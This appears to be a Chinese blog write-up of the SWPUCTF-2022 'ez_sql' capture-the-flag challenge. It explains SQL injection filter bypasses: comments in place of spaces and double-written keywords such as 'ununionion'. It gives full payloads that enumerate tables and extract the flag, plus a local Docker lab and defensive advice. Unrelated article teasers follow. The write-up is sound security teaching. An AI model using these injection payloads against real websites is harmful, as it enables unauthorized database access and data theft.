CTF SQL注入实战:SWPUCTF-2022 ez_sql 双写绕过与注释符应用解析
📅 2026/7/11 10:29:14
👁️ 次浏览
CTF SQL注入实战SWPUCTF-2022 ez_sql 双写绕过与注释符应用解析在网络安全竞赛中SQL注入始终是最基础也最考验技巧的题型之一。今天我们将通过SWPUCTF-2022新生赛的ez_sql题目深入剖析字符型注入中双写绕过与注释符替代空格的实战技巧这些方法在面对严格过滤机制时往往能出奇制胜。1. 题目环境与初步探测首先我们面对的是一个典型的登录框界面通过POST方式传递参数。初始尝试提交空参数时系统返回球球你输入点东西吧的提示这暗示着参数校验机制的存在。关键发现参数名为nss提交任意值后返回假的flag说明存在真假flag机制初步判断为字符型注入测试单引号触发报错nss1 -- 引发语法错误通过报错信息确认存在SQL注入漏洞后我们注意到系统对以下关键词进行了过滤空格字符or字符串union字符串information_schema字符串2. 绕过过滤的核心技巧2.1 注释符替代空格当空格被过滤时MySQL支持多种替代方案/**/ -- 最稳定的替代方式 %09 -- TAB键的URL编码 %0a -- 换行符 %0b -- 垂直制表符 %0c -- 换页符 %0d -- 回车符在本题中我们选择使用/**/作为空格的替代方案构造如下payload测试列数nss-1/**/oorrder/**/by/**/4#提示使用负值(-1)可以确保原始查询不返回数据使union注入的结果能够完整显示2.2 双写绕过关键词过滤当关键操作符被过滤时双写绕过是经典解决方案原始关键词双写变形原理unionununionionWAF可能只检测完整单词oroorr匹配中间插入字符information_schemainfoorrmation_schema破坏关键词连续性实战payload示例nss-1/**/ununionion/**/select/**/1,group_concat(table_name),3/**/from/**/infoorrmation_schema.tables/**/where/**/table_schemadatabase()/**/limit/**/1,1%233. 完整攻击链构建3.1 数据库结构探测通过逐步注入我们获取到以下信息数据库名称NSS_db数据表列表| 表名 | 用途推测 | |---------|----------| | NSS_tb | 目标表 | | users | 干扰表 |目标表字段nss-1/**/ununionion/**/select/**/1,group_concat(column_name),3/**/from/**/infoorrmation_schema.columns/**/where/**/table_nameNSS_tb/**/limit/**/1,1%23返回字段id, Secr3t, flll444g3.2 数据提取技巧针对多字段表推荐使用group_concat组合查询nss-1/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23结果处理建议当返回数据过长被截断时使用substring分段提取对特殊字符编码使用hex()函数转换多表关联时注意使用表名前缀避免歧义4. 本地测试环境搭建为更好理解题目建议搭建本地测试环境# Docker快速部署MySQL环境 docker run -p 3306:3306 --name ctf-sql -e MYSQL_ROOT_PASSWORDctf123 -d mysql:5.7 # 创建题目数据库 CREATE DATABASE NSS_db; USE NSS_db; # 创建数据表结构 CREATE TABLE NSS_tb( id INT PRIMARY KEY, Secr3t VARCHAR(100), flll444g VARCHAR(100) ); CREATE TABLE users(id INT, username VARCHAR(50)); # 插入测试数据 INSERT INTO NSS_tb VALUES(1, dummy, NSSCTF{e9e4d32b-8d81-4718-b0c7-54c3c29110f1});5. 防御方案与思考通过本题我们可以总结出防护SQL注入的进阶方案预处理语句$stmt $conn-prepare(SELECT * FROM users WHERE id?); $stmt-bind_param(i, $input);多层过滤机制正则表达式过滤preg_replace(/(union|select|or)/i, , $input)字符黑名单禁止/*,--,#等注释符号长度限制防止过长的注入payload最小权限原则CREATE USER webuserlocalhost IDENTIFIED BY strongpass; GRANT SELECT ON NSS_db.NSS_tb TO webuserlocalhost;在实际CTF比赛中遇到过滤机制时建议先测试所有空白字符变体尝试大小写混合、双写、注释分割等绕过方式考虑使用like,regexp等替代必要时使用十六进制编码绕过关键词检测这道题目生动展示了即使在严格过滤条件下通过灵活组合基础技巧仍能完成注入攻击。理解这些原理不仅能提升CTF解题能力更能帮助开发人员构建更安全的Web应用。
系列导读
你现在看到的是《eBPF 云原生观测实战:从内核探针到生产可观测》的第 7/10 篇,当前这篇会重点解决:教会读者在生产环境安全使用 eBPF,避免“观测反噬”性能。
上一篇回顾:第 6 篇《eBPF 在 Kubernetes 中的部署:DaemonSet 与安全上下文》主要聚焦 提供生产级 …
📅 2026/7/11 10:29:14
GitHub加速终极指南:如何让你的下载速度提升10倍以上? 【免费下载链接】Fast-GitHub 国内Github下载很慢,用上了这个插件后,下载速度嗖嗖嗖的~! 项目地址: https://gitcode.com/gh_mirrors/fa/Fast-GitHub
还在…
📅 2026/7/11 10:29:14
1. 为什么选择TMC7300PIC18LF25K80组合驱动有刷直流电机有刷直流电机(BDC)在低成本、中等精度要求的场景中依然占据重要地位。但要让电机稳定运行,驱动器和控制器的选型尤为关键。TMC7300是Trinamic(现属Maxim Integrated…
📅 2026/7/11 10:29:14
1. 项目概述:下一代直流有刷驱动器设计 在电机控制领域,直流有刷电机因其结构简单、控制方便等优势,依然在众多应用场景中占据重要地位。本项目基于TC78H651AFNG电机驱动芯片和STM32F732IE微控制器,构建了一套高性能直流有刷电机驱…
📅 2026/7/11 11:29:34
企业级部署指南:NVIDIA-Nemotron-Labs-3-Elastic-30B-A3B-NVFP4如何降低AI基础设施成本 【免费下载链接】NVIDIA-Nemotron-Labs-3-Elastic-30B-A3B-NVFP4 项目地址: https://ai.gitcode.com/hf_mirrors/nvidia/NVIDIA-Nemotron-Labs-3-Elastic-30B-A3B-NVFP4 …
📅 2026/7/11 11:29:34
鲁大师2026年汽车半年报正式发布,本期报告涵盖「汽车驾舱系统流畅榜」与「车机语音AI识别率榜」两大榜单。所有数据均来自鲁大师实验室实车测试,测试流程严谨可靠、数据真实可查,希望为消费者提供更直观的选车参考,也帮助车企更清…
📅 2026/7/11 11:29:34
1. 项目概述:基于TS2007FC与STM32F071VB的音频系统设计在嵌入式音频处理领域,如何平衡功耗、音质和成本一直是工程师面临的挑战。最近我在一个智能家居语音终端项目中,尝试将意法半导体的TS2007FC D类功放与STM32F071VB微控制器组合使用&…
📅 2026/7/11 11:29:34
更多请点击:
https://intelliparadigm.com
第一章:Gemini Gmail集成踩坑实录:Google Cloud项目配错导致的7类静默失败(附Cloud Logging诊断速查矩阵) 在将Gemini API与Gmail深度集成时,开发者常因Google C…
📅 2026/7/11 11:29:34
三步构建高效UWB室内定位系统:ESP32_UWB实战指南 【免费下载链接】UWB-Indoor-Localization_Arduino Open source Indoor localization using Arduino and ESP32_UWB tags anchors 项目地址: https://gitcode.com/gh_mirrors/uw/UWB-Indoor-Localization_Arduino…
📅 2026/7/11 11:28:33
摘要前面系列教程覆盖了 ArkUI 组件、路由、生命周期、本地存储、网络请求、Ability 底层全套基础能力,本篇统一梳理标准工程目录分层、模块化拆分、代码复用规范、全局工具统一管理、项目打包权限配置、常见工程报错统一解决方案,形成可直接用于课程设计…
📅 2026/7/11 0:00:31
1. 命令简介gpm 是 Linux 系统下运行于虚拟控制台(文字终端模式)的鼠标服务器。它的主要功能是在没有图形界面的纯文本环境中,为虚拟控制台提供鼠标支持,允许用户使用鼠标进行文本的选择、复制和粘贴操作,极大地提升了…
📅 2026/7/11 0:00:31
导语
先澄清一个常被混用的概念:BI试点"上线",并不等于试点"验收通过"。很多企业把仪表板做出来、账号发下去、培训开完场,就默认试点已经跑通,随后进入推广阶段——结果推广到第二个部门、第三个业务线时&am…
📅 2026/7/11 0:00:31
1. 项目背景与核心需求 在嵌入式系统开发中,快速精确的数据检索是一个常见但极具挑战性的需求。特别是在工业控制、医疗设备和物联网终端等场景下,系统往往需要在毫秒级时间内完成关键参数的读取和写入操作。传统基于Flash存储的方案存在擦写次数有限、操…
📅 2026/7/10 22:46:54
1. 工业电流环信号传输的基础认知在工业自动化领域,4-20mA电流环传输技术已经持续服役超过半个世纪。这种看似简单的信号传输方式之所以能经久不衰,核心在于其独特的抗干扰能力——电流信号在长距离传输时几乎不受线路电阻和电压波动的影响。我曾在化工厂…
📅 2026/7/10 22:46:54
最近在项目里尝试用 YOLO 做目标检测,从环境搭建到模型训练,再到推理部署,整个过程踩了不少坑。网上的资料虽然多,但要么版本老旧,要么步骤零散不成体系,对于刚入门的新手来说,很容易卡在某个环…
📅 2026/7/10 22:46:54
目录
第一步:选对模板,省心一半
第二步:打开扫码点餐功能
开启功能按钮
桌台管理与桌码生成
第三步:个性化设计,打造品牌感
调整点餐页面
设置点餐规则 你还在让顾客站着排队点餐吗?2025年ÿ…
📅 2026/7/10 22:46:54
在业务中快速构建一个能理解私有文档、准确回答专业问题的智能助手,是很多开发团队面临的共同挑战。传统方案往往需要从零开始搭建复杂的 RAG(检索增强生成)系统,涉及文档解析、向量化、检索、大模型调用等多个环节,整…
📅 2026/7/10 22:46:54
FAE放射组学分析工具:医学影像特征探索的完整解决方案 【免费下载链接】FAE FeAture Explorer 项目地址: https://gitcode.com/gh_mirrors/fae/FAE
你是否曾经面对海量医学影像数据感到无从下手?想要从CT、MRI等影像中提取有价值的定量特征&#…
📅 2026/7/10 22:46:54